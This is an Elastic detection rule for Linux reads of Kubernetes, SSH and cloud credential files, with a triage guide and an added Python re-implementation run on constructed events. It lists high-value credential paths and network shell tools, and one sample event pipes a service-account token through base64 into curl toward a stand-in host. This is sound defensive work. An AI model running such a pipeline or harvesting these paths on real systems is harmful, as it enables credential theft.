Kubernetes and Cloud Credential Path Access via Process Arguments

Flags Linux process executions whose arguments reference high-value Kubernetes service-account material, kubeconfig or node PKI paths, or common cloud and SSH credential files, when invoked via typical file-reading utilities or from ephemeral directories. Useful for spotting in-cluster and hybrid credential theft early.

Elastic rule

[metadata]
creation_date = "2026/04/29"
integration = ["endpoint", "auditd_manager"]
maturity = "production"
updated_date = "2026/04/29"

[rule]
author = ["Elastic"]
description = """
Flags Linux process executions whose arguments reference high-value Kubernetes service-account material, kubeconfig or
node PKI paths, or common cloud and SSH credential files, when invoked via typical file-reading utilities or from
ephemeral directories. Useful for spotting in-cluster and hybrid credential theft early.
"""
false_positives = [
    """
    Legitimate backup, compliance scanners, or admin scripts that enumerate paths under /home or /var/run/secrets may
    match. Tune by parent process, image, or automation identity.
    """,
]
from = "now-9m"
index = ["auditbeat-*", "logs-auditd_manager.auditd-*", "logs-endpoint.events.process*"]
language = "kuery"
license = "Elastic License v2"
name = "Kubernetes and Cloud Credential Path Access via Process Arguments"
note = """## Triage and analysis

### Investigating Kubernetes and Cloud Credential Path Access via Process Arguments

Confirm whether the process user and parent chain are expected to read the matched path (for example a CI job,
bootstrap script, or kubelet). Reconstruct the full command line and check for piping, encoding, or exfiltration
patterns immediately after the read.

### Possible investigation steps

- Map the workload or login session to an identity; prioritize events from nodes, jump hosts, or pods with mounted
  service account tokens.
- Correlate with file, network, and Kubernetes audit telemetry for secret reads, token minting, or API calls using
  harvested material.

### Response and remediation

- Rotate affected service account tokens, kubeconfigs, and cloud keys when access was unauthorized; review RBAC and
  secret mount policy for the workload.
"""
references = [
    "https://attack.mitre.org/techniques/T1552/",
    "https://kubernetes.io/docs/concepts/security/service-accounts/",
]
risk_score = 73
rule_id = "5f0fff18-f340-444b-9a98-c49ade766ff4"
setup = """## Setup

Requires **Elastic Defend** and/or **Auditd Manager** process telemetry (`logs-endpoint.events.process*`,
`logs-auditd_manager.auditd-*`, `auditbeat-*`) with command-line argument capture for exec events.

### Elastic Defend
Install the Elastic Defend integration via Fleet on Linux hosts and use a policy that collects process events with
arguments.

### Auditd Manager
Deploy Auditd Manager and ensure execve (or equivalent process) auditing is enabled so `process.args` and
`process.executable` populate for monitored binaries.

See https://docs.elastic.co/integrations/auditd_manager
"""
severity = "high"
tags = [
    "Data Source: Auditd Manager",
    "Data Source: Elastic Defend",
    "Domain: Endpoint",
    "Domain: Kubernetes",
    "OS: Linux",
    "Use Case: Threat Detection",
    "Tactic: Credential Access",
    "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "query"
query = '''
host.os.type:linux and event.category:process and event.action:(exec or executed) and
(
  process.name:(
    busybox or cat or head or tail or more or less or sed or awk or
    find or grep or ls or whereis or cp or mv or ln or
    curl or wget or scp or rsync or tar or zip or gzip or
    base64 or xxd or od or dd or tee or strings or xargs or jq or yq or
    openssl or ssh or sftp or nc or ncat or netcat or socat or
    python* or perl* or ruby* or node or php* or lua* or .*
  ) or
  process.args:(
    cat or head or tail or more or less or sed or awk or
    find or grep or cp or mv or curl or wget or base64 or
    tar or scp or dd or strings or xargs
  ) or
  process.executable:(/tmp/* or /var/tmp/* or /dev/shm/* or /home/* or /run/user/*)
) and process.args:(
  "/var/run/secrets/kubernetes.io/serviceaccount/token" or
  "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" or
  "/var/run/secrets/eks.amazonaws.com/serviceaccount/token" or
  "/var/run/secrets/azure/tokens/azure-identity-token" or
  "/var/run/secrets/tokens/azure-identity-token" or
  "/var/lib/kubelet/kubeconfig" or
  "/etc/kubernetes/admin.conf" or
  "/etc/kubernetes/pki/ca.key" or
  "/etc/kubernetes/pki/apiserver-kubelet-client.key" or
  "/var/lib/kubelet/pki/kubelet-client-current.pem" or
  "/etc/rancher/k3s/k3s.yaml" or
  "/etc/shadow" or
  */.ssh/id_rsa or
  */root/.ssh/id_ed25519 or
  */.ssh/id_ecdsa or
  */.aws/credentials or
  */.aws/cli/cache/*.json or
  */.aws/sso/cache/*.json or
  */.azure/accessTokens.json or
  */.azure/azureProfile.json or
  */.azure/msal_token_cache.json or
  */.config/gcloud/application_default_credentials.json or
  */.config/gcloud/credentials.db or
  */.config/gcloud/access_tokens.db or
  */.config/gcloud/legacy_credentials or
  */.kube/config or
  */.docker/config.json
)
'''

[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1552"
name = "Unsecured Credentials"
reference = "https://attack.mitre.org/techniques/T1552/"

[[rule.threat.technique.subtechnique]]
id = "T1552.001"
name = "Credentials In Files"
reference = "https://attack.mitre.org/techniques/T1552/001/"


[[rule.threat.technique]]
id = "T1528"
name = "Steal Application Access Token"
reference = "https://attack.mitre.org/techniques/T1528/"

[rule.threat.tactic]
id = "TA0006"
name = "Credential Access"
reference = "https://attack.mitre.org/tactics/TA0006/"
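To make the query's matching semantics concrete, and to show where the "reconstruct the full command line" step of the triage note actually looks, here is an added Python re-implementation of the rule's predicate run over a handful of constructed ECS-style process events. It is not part of the Elastic rule or its test data. It assumes KQL semantics for the query: a value on `process.name` or `process.args` must match a whole keyword value, `*` is the only wildcard (so the rule's `.*` entry matches names that begin with a literal dot, not every process), and the parent shell's command line is available as `process.parent.command_line`. The `exfil_indicators` helper, the `ev` event builder and the sample events are made up for this example.

```python
"""Added example: the rule's KQL predicate re-implemented in Python and run over
constructed ECS-style process events (not the Elastic rule's own code or data)."""
from fnmatch import fnmatchcase

# Clause 1: process.name literals plus KQL wildcard patterns. '*' is KQL's only
# wildcard, so the rule's '.*' entry matches names that start with a literal dot.
READER_NAMES = {
    "busybox", "cat", "head", "tail", "more", "less", "sed", "awk", "find", "grep",
    "ls", "whereis", "cp", "mv", "ln", "curl", "wget", "scp", "rsync", "tar", "zip",
    "gzip", "base64", "xxd", "od", "dd", "tee", "strings", "xargs", "jq", "yq",
    "openssl", "ssh", "sftp", "nc", "ncat", "netcat", "socat", "node",
}
READER_NAME_PATTERNS = ("python*", "perl*", "ruby*", "php*", "lua*", ".*")
# Clause 2: a reader utility named as a whole argument (e.g. "xargs cat").
READER_ARGS = {"cat", "head", "tail", "more", "less", "sed", "awk", "find", "grep", "cp",
               "mv", "curl", "wget", "base64", "tar", "scp", "dd", "strings", "xargs"}
# Clause 3: executable under an ephemeral or user-writable prefix.
EPHEMERAL_EXE = ("/tmp/*", "/var/tmp/*", "/dev/shm/*", "/home/*", "/run/user/*")
# The credential paths from the rule; entries containing '*' are wildcards.
CREDENTIAL_PATHS = (
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
    "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
    "/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
    "/var/run/secrets/azure/tokens/azure-identity-token",
    "/var/run/secrets/tokens/azure-identity-token",
    "/var/lib/kubelet/kubeconfig", "/etc/kubernetes/admin.conf",
    "/etc/kubernetes/pki/ca.key", "/etc/kubernetes/pki/apiserver-kubelet-client.key",
    "/var/lib/kubelet/pki/kubelet-client-current.pem", "/etc/rancher/k3s/k3s.yaml",
    "/etc/shadow", "*/.ssh/id_rsa", "*/root/.ssh/id_ed25519", "*/.ssh/id_ecdsa",
    "*/.aws/credentials", "*/.aws/cli/cache/*.json", "*/.aws/sso/cache/*.json",
    "*/.azure/accessTokens.json", "*/.azure/azureProfile.json",
    "*/.azure/msal_token_cache.json",
    "*/.config/gcloud/application_default_credentials.json",
    "*/.config/gcloud/credentials.db", "*/.config/gcloud/access_tokens.db",
    "*/.config/gcloud/legacy_credentials", "*/.kube/config", "*/.docker/config.json",
)
# Triage aid (not part of the rule): tokens hinting at piping, encoding or exfil.
EXFIL_HINTS = ("|", "base64", "xxd", "curl", "wget", "nc ", "ncat", "socat", "/dev/tcp/")


def _any_match(values, patterns):
    """KQL field:(a or b*) on a keyword array: some value equals a literal or matches
    a wildcard. fnmatchcase's '*' crosses '/', like KQL's, and the match is against
    the whole value, so a path buried inside a longer argument does not count."""
    return any(fnmatchcase(v, p) for v in values for p in patterns)


def matches_rule(event):
    """True when a flat ECS-style event satisfies the rule's query."""
    if event.get("host.os.type") != "linux" or event.get("event.category") != "process":
        return False
    if event.get("event.action") not in ("exec", "executed"):
        return False
    name, exe = event.get("process.name", ""), event.get("process.executable", "")
    args = event.get("process.args", [])
    suspicious_reader = (
        name in READER_NAMES
        or _any_match([name], READER_NAME_PATTERNS)
        or bool(READER_ARGS.intersection(args))
        or _any_match([exe], EPHEMERAL_EXE)
    )
    return suspicious_reader and _any_match(args, CREDENTIAL_PATHS)


def exfil_indicators(event):
    """Each utility in a shell pipeline is its own exec event, so the pipe and what
    follows it live in the parent shell's command line (assumed to be captured as
    process.parent.command_line). Return the hints found there, sorted."""
    cmdline = event.get("process.parent.command_line", "")
    return sorted(h.strip() for h in EXFIL_HINTS if h in cmdline)


def ev(name, exe, args, parent_cmdline=""):
    """Build a minimal constructed exec event in flat ECS field notation."""
    return {"host.os.type": "linux", "event.category": "process", "event.action": "exec",
            "process.name": name, "process.executable": exe, "process.args": args,
            "process.parent.command_line": parent_cmdline}


SAMPLE_EVENTS = [  # constructed samples, not real telemetry
    # 0: in-pod token read spawned by a shell pipeline -> fires (clause 1)
    ev("cat", "/bin/cat", ["cat", "/var/run/secrets/kubernetes.io/serviceaccount/token"],
       "sh -c 'cat /var/run/secrets/kubernetes.io/serviceaccount/token"
       " | base64 -w0 | curl -d @- http://203.0.113.10/c'"),
    # 1: unknown binary in /tmp reading AWS keys -> fires (clause 3, wildcard path)
    ev("svc", "/tmp/.x/svc", ["/tmp/.x/svc", "/home/deploy/.aws/credentials"]),
    # 2: python one-liner with the path inside the script text -> no whole-token match
    ev("python3", "/usr/bin/python3.11", ["python3", "-c", "open('/root/.kube/config').read()"]),
    # 3: kubelet passing its kubeconfig as --flag=value -> not a reader, no token match
    ev("kubelet", "/usr/bin/kubelet", ["kubelet", "--kubeconfig=/var/lib/kubelet/kubeconfig"]),
    # 4: reader utility on an uninteresting file -> no credential path
    ev("cat", "/bin/cat", ["cat", "/etc/hostname"]),
]


def evaluate(events):
    """Return (index, exfil hints) for every event the rule would fire on."""
    return [(i, exfil_indicators(e)) for i, e in enumerate(events) if matches_rule(e)]


if __name__ == "__main__":
    for i, hints in evaluate(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[i]
        print(f"ALERT #{i}: {e['process.executable']} {e['process.args']} pipeline hints: {hints}")
```

Two of the samples are worth a second look. Event 0 is the common shape of a real hit: the alerting exec is the `cat` child, whose own arguments are just the token path; the pipe, the encoder and the outbound `curl` only appear in the parent `sh -c` command line, which is why the triage note tells you to rebuild the full command line rather than stop at the matching process. Event 2 shows the corresponding gap: because every value in the query is matched against a whole argument token, a credential path embedded in an inline script, a `--flag=value` pair or a quoted string does not fire, so treat the rule as a high-signal trigger rather than complete coverage of credential-file reads.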

Triage and analysis

Investigating Kubernetes and Cloud Credential Path Access via Process Arguments

Confirm whether the process user and parent chain are expected to read the matched path (for example a CI job, bootstrap script, or kubelet). Reconstruct the full command line and check for piping, encoding, or exfiltration patterns immediately after the read. A shell pipeline produces a separate exec event for each utility, so the pipe and any encoder or network tool that follows the read usually appear in the parent shell's command line rather than in the arguments of the process that matched.

Possible investigation steps

  • Map the workload or login session to an identity; prioritize events from nodes, jump hosts, or pods with mounted service account tokens.
  • Correlate with file, network, and Kubernetes audit telemetry for secret reads, token minting, or API calls using harvested material.

Response and remediation

  • Rotate affected service account tokens, kubeconfigs, and cloud keys when access was unauthorized; review RBAC and secret mount policy for the workload.
